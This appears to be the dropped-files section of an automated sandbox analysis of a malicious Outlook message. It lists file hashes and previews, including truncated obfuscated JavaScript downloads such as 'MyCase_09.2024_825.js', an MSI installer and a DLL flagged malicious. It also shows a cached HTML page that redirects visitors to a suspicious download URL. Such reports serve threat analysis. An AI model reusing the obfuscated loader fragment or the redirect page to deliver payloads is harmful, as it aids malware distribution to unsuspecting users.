C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 1 18:11:41 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	3.993343552612904
Encrypted:	false
SSDEEP:
MD5:	102BB49DF12C555D0262F470617FD777
SHA1:	911560AE4080766EEC5CC9122ECCF58B8646FE5D
SHA-256:	F9E64081C6F82BA46DA30EBBF7F3156377FFFB70B4D8F98A975B9470DA6429A0
SHA-512:	6339439D58250875D0465F0693D814BE20366C04BDE0D8EED4EA5630D75B75404892E4F081B76697FBE8010545ACC702F0DDBD81A881960EA00386832FBAFCA4
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.......5...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IAYf.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VAYt.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VAYt.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VAYt............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VAYu............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........op.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2689
Entropy (8bit):	4.001422267247514
Encrypted:	false
SSDEEP:
MD5:	7FE0148477C19ABD5265FB1DBE7627FE
SHA1:	036CC446FF45DDB9C30EB0B98CBFCFB395BCA862
SHA-256:	DB9BA0B18A8D1033B8D552236E860C2D7E936F8D1BDA0119043E42D7910DEFF4
SHA-512:	E93722F1BC347F7D72A1D49A0BA4720E27EF9EB91228D39A93D8861A91DCA72B8943ED86390A3FD2A88B8FC0294E53C89EC6A24F3C34E271F4E1B7E62D471CF9
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IAYf.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VAYt.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VAYt.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VAYt............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........op.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 1 18:11:41 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.988083657376457
Encrypted:	false
SSDEEP:
MD5:	8449AC186FE76F16D66781E34D709F7C
SHA1:	D4AEFEDEC5B6E346559FE9E0274063D766CFABEB
SHA-256:	C662C816DFC2600370702689F69D62521D1DCC61D82ED26F1E4E4D0B5C9CF49B
SHA-512:	628113ED819D3AA5C9AA10E83E00597515ECD5509FEC8C39815C6F4549E29C9916EE9EBD307ADC006F77FD8455753B38463417A1D990332CC7799FE48FBF4703
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....p..5...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IAYf.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VAYt.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VAYt.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VAYt............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VAYu............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........op.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 1 18:11:42 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9785859723703716
Encrypted:	false
SSDEEP:
MD5:	D04FBE8C91AD571B173D9042AB9E8C95
SHA1:	54801D3EEB03C07E6089F781E75FF5E3B645F853
SHA-256:	B5212F0F734453FDABB4F48AD354289555CE517DDEB79D272F8E574770E5F7DE
SHA-512:	6667EF92CA3942C4571D371D3F187388101FB0ECF7F5B821876F3416F461BCA04658D5B883B8F0EDF5A27AC1F647B6940735A342DECBE60F6D6325992ADE16D5
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....!m..5...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IAYf.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VAYt.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VAYt.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VAYt............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VAYu............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........op.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 1 18:11:41 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9868642811369273
Encrypted:	false
SSDEEP:
MD5:	09F685C1B2F40DC8A292BD83CCC960E8
SHA1:	FD879774735482ADC5C2148AB889224995E511D4
SHA-256:	2BFF9B389284D32D4E88C942ADA1B1381B3FF9C99AA86ABE15AFAA74D3235198
SHA-512:	060B744517699E483B354CF643A065295840FA374C9A88AFA04E02D0D5253070AA799B52D040CCB438EAADC0D43355FB43A8544B67914167876F910EC9892BA8
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....D.5...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IAYf.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VAYt.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VAYt.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VAYt............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VAYu............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........op.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
File Type:	Microsoft Outlook email folder (>=2003)
Category:	dropped
Size (bytes):	271360
Entropy (8bit):	1.338249925206376
Encrypted:	false
SSDEEP:
MD5:	2A37D8C19B6FC4AEDDAA3FC038E52232
SHA1:	452EE990EF3DD198965DC214C90C48443F0D541B
SHA-256:	66E88B3DA9B2A5BB63177DEBEA286391269460FA1951B4C57DAAC8B824B39C93
SHA-512:	FDB3230C30550234F9BF868568CC2B2B7E5E3300561862A9BE0AE08A027A3DD35C3C835642ACE6DCA0E530AD81ECC72279275D09D0C7695695759174181F3958
Malicious:	true
Reputation:	unknown
Preview:	!BDN=...SM......\...............4.......U................@...........@...@...................................@...........................................................................$.......D.......L..............0...............3.....................................................................................................................................................................................................................................................................................................D.../.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	1.127711282469095
Encrypted:	false
SSDEEP:
MD5:	7EA7AAC0435CF599E099D15172475623
SHA1:	7DC6B0B12349EFE3EA36429FFC4FE3A80EEBF2F6
SHA-256:	5947D4C926336B9936C99AC6EBA042344DF60A80600E876D03F464E0E7235087
SHA-512:	BBF51005AFD2F4C8D02150F85E1EC91EBB13136D1897741D112AE0574A62903DCA570ADDBB7133477AFBC02774D73F013695E775E5A80A05277C07A0B3137266
Malicious:	true
Reputation:	unknown
Preview:	\|...C...T...........!8..5.....................#.!BDN=...SM......\...............4.......U................@...........@...@...................................@...........................................................................$.......D.......L..............0...............3.....................................................................................................................................................................................................................................................................................................D.../.!8..5........B............#.........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Downloads\16cd823e-e460-45af-bf8e-0b5f8d92a4e5.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (16384), with no line terminators
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	5.156442750039293
Encrypted:	false
SSDEEP:
MD5:	6EEA57608797BFD8BBE59486E28659AC
SHA1:	ED1E9BC9F42D595C2CF0F3E77113CDFAFADA5EB6
SHA-256:	C127A9A9E1C5BC881EAD3E9AAAC0C2657094BCB5C167CC6AC881B26331561608
SHA-512:	9ADE0263F72BEBDA7EBAB1A5E27023051891EE0E7A1BFCFDC5F3515EBDAC66FD085ED1F5C22BB759C2E86A6324E0896D00EBA124FA9AD3E401A64C7F08CA94BA
Malicious:	false
Reputation:	unknown
Preview:	(function(_0xb23b81,_0x5aec0c){var _0x17ba92=_0x2e99,_0x8342=_0xb23b81();while(!![]){try{var _0x145be0=-parseInt(_0x17ba92(0x4f0))/(0x1c16+0x1d0x50+-0x250x101)+-parseInt(_0x17ba92(0x9b8))/(0x70x54a+-0x10x12ea+-0x121a)(parseInt(_0x17ba92(0x4aa))/(-0x425+0x10x1cae+-0x1886))+-parseInt(_0x17ba92(0x958))/(0x24c2+-0x4a-0x1b+-0x10x2c8c)(-parseInt(_0x17ba92(0x38a))/(-0x6de0x3+-0x20c7-0x1+0xc28-0x1))+-parseInt(_0x17ba92(0x991))/(0x1766+-0x70x3a1+0x207)+parseInt(_0x17ba92(0xb65))/(0x3-0x329+0x1-0x19c0+0x2342)(-parseInt(_0x17ba92(0x425))/(-0xfcd-0x1+-0x61d+-0x1350x8))+-parseInt(_0x17ba92(0x11a))/(0xb600x1+0x10550x1+-0x5c0x4d)+-parseInt(_0x17ba92(0x2b8))/(-0x8-0x405+-0x1fd0+-0x4e)(-parseInt(_0x17ba92(0x251))/(0x4de+0x2d-0x81+0x50x392));if(_0x145be0===_0x5aec0c)break;else _0x8342['push'](_0x8342['shift']());}catch(_0x3732be){_0x8342['push'](_0x8342['shift']());}}}(_0xb6da,-0x4b0d4+-0x1af34+0x10xe5fb4),(function(_0x25a907,_0x474f62){var _0x3d6f67=_0x2e99,_0x4905d0={'yDhCG':

C:\Users\user\Downloads\81057dd7-b350-4f69-b6a0-fcc073956d9a.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32768), with no line terminators
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.055360670238739
Encrypted:	false
SSDEEP:
MD5:	EE586068A2DAD266DB3CC9FE92E28278
SHA1:	7ABEB153C7A1D56DE62D4AEC9A3219EA0C747769
SHA-256:	571D07CDD5950D78164C2D6B9D28C6360B84873FA15615944BD52031ADDA5F51
SHA-512:	742F7783119AA1AE0703A372C66FD45A0BEE0D1ABF2BE2C0215FC50E2D3225AAE41E054ABF91D9D76078AED725E1DFFEE183393BE9DE29D5183E8E87BC0146AF
Malicious:	false
Reputation:	unknown
Preview:	(function(_0xb23b81,_0x5aec0c){var _0x17ba92=_0x2e99,_0x8342=_0xb23b81();while(!![]){try{var _0x145be0=-parseInt(_0x17ba92(0x4f0))/(0x1c16+0x1d0x50+-0x250x101)+-parseInt(_0x17ba92(0x9b8))/(0x70x54a+-0x10x12ea+-0x121a)(parseInt(_0x17ba92(0x4aa))/(-0x425+0x10x1cae+-0x1886))+-parseInt(_0x17ba92(0x958))/(0x24c2+-0x4a-0x1b+-0x10x2c8c)(-parseInt(_0x17ba92(0x38a))/(-0x6de0x3+-0x20c7-0x1+0xc28-0x1))+-parseInt(_0x17ba92(0x991))/(0x1766+-0x70x3a1+0x207)+parseInt(_0x17ba92(0xb65))/(0x3-0x329+0x1-0x19c0+0x2342)(-parseInt(_0x17ba92(0x425))/(-0xfcd-0x1+-0x61d+-0x1350x8))+-parseInt(_0x17ba92(0x11a))/(0xb600x1+0x10550x1+-0x5c0x4d)+-parseInt(_0x17ba92(0x2b8))/(-0x8-0x405+-0x1fd0+-0x4e)(-parseInt(_0x17ba92(0x251))/(0x4de+0x2d-0x81+0x50x392));if(_0x145be0===_0x5aec0c)break;else _0x8342['push'](_0x8342['shift']());}catch(_0x3732be){_0x8342['push'](_0x8342['shift']());}}}(_0xb6da,-0x4b0d4+-0x1af34+0x10xe5fb4),(function(_0x25a907,_0x474f62){var _0x3d6f67=_0x2e99,_0x4905d0={'yDhCG':

C:\Users\user\Downloads\MyCase_09.2024_825.js (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:
MD5:	4FDDA3636C4C2351A7A8636C7E2D9930
SHA1:	D9CD7322A6AE1DAFA5E8633339729B41454EAD18
SHA-256:	1BFCCA589D061F182FBA89D02C7331327E65DBBE68854D09D843BE4178BD74DC
SHA-512:	7512EDD5C3B4DC71F9E5AD556416EC680F7C119342C2942B4D66407C040310ACDFE827A87D7A7E60D7D5C29F70847D6628E379563F18FB92227C8B523D843F52
Malicious:	false
Reputation:	unknown
Preview:	(function(_0xb23b81,_0x5aec0c){var _0x17ba92=_0x2e99,_0x8342=_0xb23b81();while(!![]){try{var _0x145be0=-parseInt(_0x17ba92(0x4f0))/(0x1c16+0x1d0x50+-0x250x101)+-parseInt(_0x17ba92(0x9b8))/(0x70x54a+-0x10x12ea+-0x121a)(parseInt(_0x17ba92(0x4aa))/(-0x425+0x10x1cae+-0x1886))+-parseInt(_0x17ba92(0x958))/(0x24c2+-0x4a-0x1b+-0x10x2c8c)(-parseInt(_0x17ba92(0x38a))/(-0x6de0x3+-0x20c7-0x1+0xc28-0x1))+-parseInt(_0x17ba92(0x991))/(0x1766+-0x70x3a1+0x207)+parseInt(_0x17ba92(0xb65))/(0x3-0x329+0x1-0x19c0+0x2342)(-parseInt(_0x17ba92(0x425))/(-0xfcd-0x1+-0x61d+-0x1350x8))+-parseInt(_0x17ba92(0x11a))/(0xb600x1+0x10550x1+-0x5c0x4d)+-parseInt(_0x17ba92(0x2b8))/(-0x8-0x405+-0x1fd0+-0x4e)(-parseInt(_0x17ba92(0x251))/(0x4de+0x2d-0x81+0x50x392));if(_0x145be0===_0x5aec0c)break;else _0x8342['push'](_0x8342['shift']());}catch(_0x3732be){_0x8342['push'](_0x8342['shift']());}}}(_0xb6da,-0x4b0d4+-0x1af34+0x10xe5fb4),(function(_0x25a907,_0x474f62){var _0x3d6f67=_0x2e99,_0x4905d0={'yDhCG':

C:\Users\user\Downloads\Unconfirmed 200405.crdownload

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	393216
Entropy (8bit):	5.161659384579382
Encrypted:	false
SSDEEP:
MD5:	BC9D367B745804B25A56107AD99048C0
SHA1:	AD8EF926BAED58A457A5350232C1C46D479D0B35
SHA-256:	C13A4E17AB0425D8B6E7235F3932C49FE6A17612439D8FD1CE87FC7B0EA84A15
SHA-512:	D6852F3236117E018F0F550B7A771D2B4226C16C654E20E9C2331B3586CBE4D4EFD153272CAFECB399F2CE058144AD61A8364AB8E35D804FC39C4531E3993A3C
Malicious:	false
Reputation:	unknown
Preview:	(function(_0xb23b81,_0x5aec0c){var _0x17ba92=_0x2e99,_0x8342=_0xb23b81();while(!![]){try{var _0x145be0=-parseInt(_0x17ba92(0x4f0))/(0x1c16+0x1d0x50+-0x250x101)+-parseInt(_0x17ba92(0x9b8))/(0x70x54a+-0x10x12ea+-0x121a)(parseInt(_0x17ba92(0x4aa))/(-0x425+0x10x1cae+-0x1886))+-parseInt(_0x17ba92(0x958))/(0x24c2+-0x4a-0x1b+-0x10x2c8c)(-parseInt(_0x17ba92(0x38a))/(-0x6de0x3+-0x20c7-0x1+0xc28-0x1))+-parseInt(_0x17ba92(0x991))/(0x1766+-0x70x3a1+0x207)+parseInt(_0x17ba92(0xb65))/(0x3-0x329+0x1-0x19c0+0x2342)(-parseInt(_0x17ba92(0x425))/(-0xfcd-0x1+-0x61d+-0x1350x8))+-parseInt(_0x17ba92(0x11a))/(0xb600x1+0x10550x1+-0x5c0x4d)+-parseInt(_0x17ba92(0x2b8))/(-0x8-0x405+-0x1fd0+-0x4e)(-parseInt(_0x17ba92(0x251))/(0x4de+0x2d-0x81+0x50x392));if(_0x145be0===_0x5aec0c)break;else _0x8342['push'](_0x8342['shift']());}catch(_0x3732be){_0x8342['push'](_0x8342['shift']());}}}(_0xb6da,-0x4b0d4+-0x1af34+0x10xe5fb4),(function(_0x25a907,_0x474f62){var _0x3d6f67=_0x2e99,_0x4905d0={'yDhCG':

C:\Users\user\Downloads\Unconfirmed 3640.crdownload

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	406724
Entropy (8bit):	5.169544595573388
Encrypted:	false
SSDEEP:
MD5:	4FDDA3636C4C2351A7A8636C7E2D9930
SHA1:	D9CD7322A6AE1DAFA5E8633339729B41454EAD18
SHA-256:	1BFCCA589D061F182FBA89D02C7331327E65DBBE68854D09D843BE4178BD74DC
SHA-512:	7512EDD5C3B4DC71F9E5AD556416EC680F7C119342C2942B4D66407C040310ACDFE827A87D7A7E60D7D5C29F70847D6628E379563F18FB92227C8B523D843F52
Malicious:	false
Reputation:	unknown
Preview:	(function(_0xb23b81,_0x5aec0c){var _0x17ba92=_0x2e99,_0x8342=_0xb23b81();while(!![]){try{var _0x145be0=-parseInt(_0x17ba92(0x4f0))/(0x1c16+0x1d0x50+-0x250x101)+-parseInt(_0x17ba92(0x9b8))/(0x70x54a+-0x10x12ea+-0x121a)(parseInt(_0x17ba92(0x4aa))/(-0x425+0x10x1cae+-0x1886))+-parseInt(_0x17ba92(0x958))/(0x24c2+-0x4a-0x1b+-0x10x2c8c)(-parseInt(_0x17ba92(0x38a))/(-0x6de0x3+-0x20c7-0x1+0xc28-0x1))+-parseInt(_0x17ba92(0x991))/(0x1766+-0x70x3a1+0x207)+parseInt(_0x17ba92(0xb65))/(0x3-0x329+0x1-0x19c0+0x2342)(-parseInt(_0x17ba92(0x425))/(-0xfcd-0x1+-0x61d+-0x1350x8))+-parseInt(_0x17ba92(0x11a))/(0xb600x1+0x10550x1+-0x5c0x4d)+-parseInt(_0x17ba92(0x2b8))/(-0x8-0x405+-0x1fd0+-0x4e)(-parseInt(_0x17ba92(0x251))/(0x4de+0x2d-0x81+0x50x392));if(_0x145be0===_0x5aec0c)break;else _0x8342['push'](_0x8342['shift']());}catch(_0x3732be){_0x8342['push'](_0x8342['shift']());}}}(_0xb6da,-0x4b0d4+-0x1af34+0x10xe5fb4),(function(_0x25a907,_0x474f62){var _0x3d6f67=_0x2e99,_0x4905d0={'yDhCG':

C:\Windows\Installer\528ed3.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: install 1.12.645.4, Subject: install, Author: install, Keywords: Installer, Template: Intel;1033, Revision Number: {588221A1-0002-4909-A6D9-8C71C3F5A1C1}, Create Time/Date: Thu Jan 11 14:59:44 2024, Last Saved Time/Date: Thu Jan 11 14:59:44 2024, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (11.0.53.0), Security: 2
Category:	dropped
Size (bytes):	2011136
Entropy (8bit):	5.807490555197524
Encrypted:	false
SSDEEP:
MD5:	97EF9975F0057D4F017E38E6A909080E
SHA1:	D818BC65214C2B0030EC50C63D43427826F10F41
SHA-256:	FE4CE0104B55DA656A7CBC36FFCBA39BE444B1B638854493E01F5906D21B290F
SHA-512:	6D78CD7D90FA3B2B48D448E90C6704B5EF1D2BD30B7FFE12ED2657C7203CDA3493A984FB8A50C55EF46D9CB55DA50848C698F09FA4BFEC26B2583C0C045A6E70
Malicious:	false
Reputation:	unknown
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI900C.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	212992
Entropy (8bit):	6.513409725320959
Encrypted:	false
SSDEEP:
MD5:	0C8921BBCC37C6EFD34FAF44CF3B0CB5
SHA1:	DCFA71246157EDCD09EECAF9D4C5E360B24B3E49
SHA-256:	FD622CF73EA951A6DE631063ABA856487D77745DD1500ADCA61902B8DDE56FE1
SHA-512:	ED55443E20D40CCA90596F0A0542FA5AB83FE0270399ADFAAFD172987FB813DFD44EC0DA0A58C096AF3641003F830341FE259AD5BCE9823F238AE63B7E11E108
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L...Y..e...........!.....h..........K................................................]....@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................

Chrome Cache Entry: 73

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 (with BOM) text
Category:	downloaded
Size (bytes):	976
Entropy (8bit):	5.531808775981342
Encrypted:	false
SSDEEP:
MD5:	F23E215024537C8B9E948C810B899D30
SHA1:	2BC98399063A655BB3C686A47D98E4084A374E37
SHA-256:	22228257D675A0DC8D171F4D65E69AE335C510335F1DBE27FADFD66EF9089C83
SHA-512:	DE816C292493D33E56D84E5F8A1D4CD385905E57C9E3425B8CDCD20E8037179CACAE4F43E50974D8473B2818C0D6477BF967199611622997404B80FC54777A3D
Malicious:	false
Reputation:	unknown
URL:	http://hub-res.selvas.com/market/fatalraid/zh-HK/hub.html?download_url=https://meatmsges.com
Preview:	.<!DOCTYPE html>.<html>..<head>...<meta charset="UTF-8">...<title>No.1..FPS FATAL RAID</title>...<meta property="og:type" content="website">...<meta property="og:site_name" content="No.1..FPS FATAL RAID">...<meta property="og:url" content="http://hub-res.selvas.com/market/fatalraid/zh-HK/hub.html">...<meta property="og:title" content="No.1..FPS FATAL RAID">...<meta property="og:image" content="http://hub-res.selvas.com/market/fatalraid/zh-HK/img/title.jpg">...<meta property="og:description" content="PC FPS.....">...<meta name="description" content="PC FPS.....">...<meta http-equiv="X-UA-Compatible" content="IE=edge">..</head>..<body>...<script>....var query = window.location.search.substring(1);....var vars = query.split("&");....for (var i=0;i<vars.length;i++) {.....var pair = vars[i].split("=");.....if(pair[0] == "download_url") {......window.location.href = decodeURIComponent(pair[1]);.....}....}...</script>..</body>.</html>.

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\expand.exe
File Type:	ASCII text, with very long lines (1014), with CRLF, CR, LF line terminators, with overstriking
Category:	dropped
Size (bytes):	1213
Entropy (8bit):	3.5054782557084927
Encrypted:	false
SSDEEP:
MD5:	63BF633348ECA7B5C7EF05BA264AEC09
SHA1:	29142EF6333E3767EED9F6765D6208B2A9F6FB22
SHA-256:	C23EDCAD39A3F5DAE9D26051118EF1FA9FADA047E9EEE9E8FE23A89D79A90E08
SHA-512:	EB2E6DDA9404251F269B464BD67F35E75EBA834B34BEA0A8A3C2F538ADAB81FD925A4F134981480C1E91EE790264AB19B047BB569097A2A45AF8C550F5164FC8
Malicious:	false
Reputation:	unknown
Preview:	Microsoft (R) File Expansion Utility..Copyright (c) Microsoft Corporation. All rights reserved.....Adding files\setup.exe to Extraction Queue....Expanding Files ......Progress: 0 out of 1 files..........................Progress: 0 out of 1 files..........................Progress: 0 out of 1 files..........................Progress: 0 out of 1 files..........................Progress: 0 out of 1 files..........................Progress: 0 out of 1 files..........................Progress: 0 out of 1 files..........................Progress: 0 out of 1 files..........................Progress: 0 out of 1 files..........................Progress: 0 out of 1 files..........................Progress: 0 out of 1 files..........................Progress: 0 out of 1 files..........................Progress: 0 out of 1 files..........................Progress: 0 out of 1 files..........................Progress: 0 out of 1 files..........................Progress: 0 out of 1 files..........................P

Static File Info

General

File type:	CDFV2 Microsoft Outlook Message
Entropy (8bit):	4.195271902739383
TrID:	Outlook Message (71009/1) 58.92% Outlook Form Template (41509/1) 34.44% Generic OLE2 / Multistream Compound File (8008/1) 6.64%
